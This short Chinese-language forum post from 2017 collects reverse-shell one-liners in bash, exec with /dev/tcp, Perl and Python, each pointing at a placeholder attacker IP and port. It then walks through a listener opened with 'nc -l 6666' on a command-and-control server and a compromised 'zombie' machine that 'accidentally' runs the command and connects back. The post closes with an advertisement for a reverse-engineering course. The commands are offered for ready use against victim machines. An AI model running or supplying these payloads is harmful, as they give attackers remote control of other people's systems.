-
-
反弹shell暨内网上线命令
-
发表于: 2017-12-11 12:48
-
看到一篇有意思的文章
自古评论出大神
利用exec弹
$ exec 5<> /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1 $ cat <&5 | while read line; do $line 2>&5 >&5; done
利用bash弹,在目标机器上执行
bash -i >& /dev/tcp/your-fuxking-public-ip/your-fuxking-port 0>&1
利用perl弹
perl -e 'use Socket;$i="your-fuxking-public-ip";$p=your-fuxking-port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'利用python弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your-fuxking-public-ip",your-fuxking-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
尝试一下
挑个最简单的尝试一下吧,模型是最简单的肉鸡上线模型。
首先在
c2c服务器上开6666端口,等待连接:# nc -l 6666
肉鸡 “不小心” 执行了我们的命令:
106.*.*.*那个打码的c2c服务器地址,6666是端口号。上线!
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
